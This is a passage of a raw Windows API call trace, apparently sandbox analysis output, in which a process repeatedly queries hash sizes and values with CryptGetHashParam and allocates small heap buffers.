[0188.093] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e7cf20, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cf20, pdwDataLen=0xce51c) returned 1 [0188.093] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.093] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c830 [0188.093] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32e7c830, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c830, pdwDataLen=0xce51c) returned 1 [0188.093] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.093] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c5f0 [0188.093] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e7c5f0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c5f0, pdwDataLen=0xce51c) returned 1 [0188.093] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.093] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7ca70 [0188.093] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e7ca70, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7ca70, pdwDataLen=0xce51c) returned 1 [0188.093] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.093] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c920 [0188.093] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32e7c920, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c920, pdwDataLen=0xce51c) returned 1 [0188.093] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.093] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7cb30 [0188.093] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32e7cb30, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cb30, pdwDataLen=0xce51c) returned 1 [0188.093] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.093] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7caa0 [0188.093] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32e7caa0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7caa0, pdwDataLen=0xce51c) returned 1 [0188.093] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.094] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c3b0 [0188.094] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e7c3b0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c3b0, pdwDataLen=0xce51c) returned 1 [0188.094] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.094] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c4d0 [0188.094] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32e7c4d0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c4d0, pdwDataLen=0xce51c) returned 1 [0188.094] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.094] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c500 [0188.094] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32e7c500, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c500, pdwDataLen=0xce51c) returned 1 [0188.094] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.094] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7ca40 [0188.094] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x2, pbData=0x32e7ca40, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7ca40, pdwDataLen=0xce51c) returned 1 [0188.094] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.094] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c590 [0188.094] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x2, pbData=0x32e7c590, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c590, pdwDataLen=0xce51c) returned 1 [0188.094] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.094] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7cad0 [0188.094] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e7cad0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cad0, pdwDataLen=0xce51c) returned 1 [0188.094] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.094] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c890 [0188.094] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32e7c890, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c890, pdwDataLen=0xce51c) returned 1 [0188.094] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.094] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c980 [0188.094] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e7c980, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c980, pdwDataLen=0xce51c) returned 1 [0188.095] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.095] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c650 [0188.095] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x2, pbData=0x32e7c650, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c650, pdwDataLen=0xce51c) returned 1 [0188.095] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.095] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c8c0 [0188.095] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e7c8c0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c8c0, pdwDataLen=0xce51c) returned 1 [0188.095] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.095] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c680 [0188.097] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32e7c680, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c680, pdwDataLen=0xce51c) returned 1 [0188.097] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.097] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7cd10 [0188.097] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x2, pbData=0x32e7cd10, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cd10, pdwDataLen=0xce51c) returned 1 [0188.098] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.098] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c7a0 [0188.098] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32e7c7a0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c7a0, pdwDataLen=0xce51c) returned 1 [0188.098] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.098] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7cb00 [0188.098] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e7cb00, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cb00, pdwDataLen=0xce51c) returned 1 [0188.098] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.098] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c6b0 [0188.098] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e7c6b0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c6b0, pdwDataLen=0xce51c) returned 1 [0188.098] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.098] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7c6e0 [0188.098] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e7c6e0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c6e0, pdwDataLen=0xce51c) returned 1 [0188.098] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.098] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e7c380, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c380, pdwDataLen=0xce51c) returned 1 [0188.098] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.098] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32e7cef0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cef0, pdwDataLen=0xce51c) returned 1 [0188.099] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.099] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x2, pbData=0x32e7cd70, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cd70, pdwDataLen=0xce51c) returned 1 [0188.099] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.099] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e7c710, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c710, pdwDataLen=0xce51c) returned 1 [0188.099] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.099] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x2, pbData=0x32e7c770, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c770, pdwDataLen=0xce51c) returned 1 [0188.099] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.099] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32e7ce90, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7ce90, pdwDataLen=0xce51c) returned 1 [0188.099] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.099] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32e7c7d0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c7d0, pdwDataLen=0xce51c) returned 1 [0188.099] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.099] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32e7cb60, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cb60, pdwDataLen=0xce51c) returned 1 [0188.099] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.099] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e7c9b0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c9b0, pdwDataLen=0xce51c) returned 1 [0188.099] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.099] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e7c860, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c860, pdwDataLen=0xce51c) returned 1 [0188.100] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.100] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e7c3e0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c3e0, pdwDataLen=0xce51c) returned 1 [0188.100] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.100] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e7cc80, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cc80, pdwDataLen=0xce51c) returned 1 [0188.100] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.100] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32e7c9e0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7c9e0, pdwDataLen=0xce51c) returned 1 [0188.100] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.100] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32e7cb90, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cb90, pdwDataLen=0xce51c) returned 1 [0188.100] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.100] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e7cbc0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cbc0, pdwDataLen=0xce51c) returned 1 [0188.100] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.100] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e7cc20, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cc20, pdwDataLen=0xce51c) returned 1 [0188.100] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.100] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32e7cc50, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cc50, pdwDataLen=0xce51c) returned 1 [0188.101] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.101] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x2, pbData=0x32e7cda0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cda0, pdwDataLen=0xce51c) returned 1 [0188.101] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.101] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x2, pbData=0x32e7cdd0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cdd0, pdwDataLen=0xce51c) returned 1 [0188.101] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.101] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x2, pbData=0x32e7ce00, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7ce00, pdwDataLen=0xce51c) returned 1 [0188.101] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.101] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e7ce30, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7ce30, pdwDataLen=0xce51c) returned 1 [0188.101] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.101] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e7ce60, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7ce60, pdwDataLen=0xce51c) returned 1 [0188.101] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.101] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e7db50, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7db50, pdwDataLen=0xce51c) returned 1 [0188.101] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.101] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e7d1c0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d1c0, pdwDataLen=0xce51c) returned 1 [0188.101] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.101] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32e7cfb0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cfb0, pdwDataLen=0xce51c) returned 1 [0188.102] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.102] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32e7d430, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d430, pdwDataLen=0xce51c) returned 1 [0188.102] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.102] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e7d280, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d280, pdwDataLen=0xce51c) returned 1 [0188.102] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.102] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e7d880, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d880, pdwDataLen=0xce51c) returned 1 [0188.102] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.102] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e7cfe0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7cfe0, pdwDataLen=0xce51c) returned 1 [0188.102] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.102] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e7d580, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d580, pdwDataLen=0xce51c) returned 1 [0188.102] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.102] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32e7d1f0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d1f0, pdwDataLen=0xce51c) returned 1 [0188.102] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.102] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x2, pbData=0x32e7d130, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d130, pdwDataLen=0xce51c) returned 1 [0188.103] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.103] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e7d760, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d760, pdwDataLen=0xce51c) returned 1 [0188.103] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.103] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32e7d8b0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d8b0, pdwDataLen=0xce51c) returned 1 [0188.103] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.103] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x2, pbData=0x32e7d310, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d310, pdwDataLen=0xce51c) returned 1 [0188.103] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.103] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32e7d490, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d490, pdwDataLen=0xce51c) returned 1 [0188.103] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.103] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x2, pbData=0x32e7d550, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d550, pdwDataLen=0xce51c) returned 1 [0188.103] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.103] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x2, pbData=0x32e7d520, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d520, pdwDataLen=0xce51c) returned 1 [0188.103] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.103] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e7d670, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d670, pdwDataLen=0xce51c) returned 1 [0188.103] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.103] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32e7d4f0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d4f0, pdwDataLen=0xce51c) returned 1 [0188.104] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.104] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32e7d070, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e7d070, pdwDataLen=0xce51c) returned 1 [0188.104] CryptGetHashParam (in: hHash=0x3396f740, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, 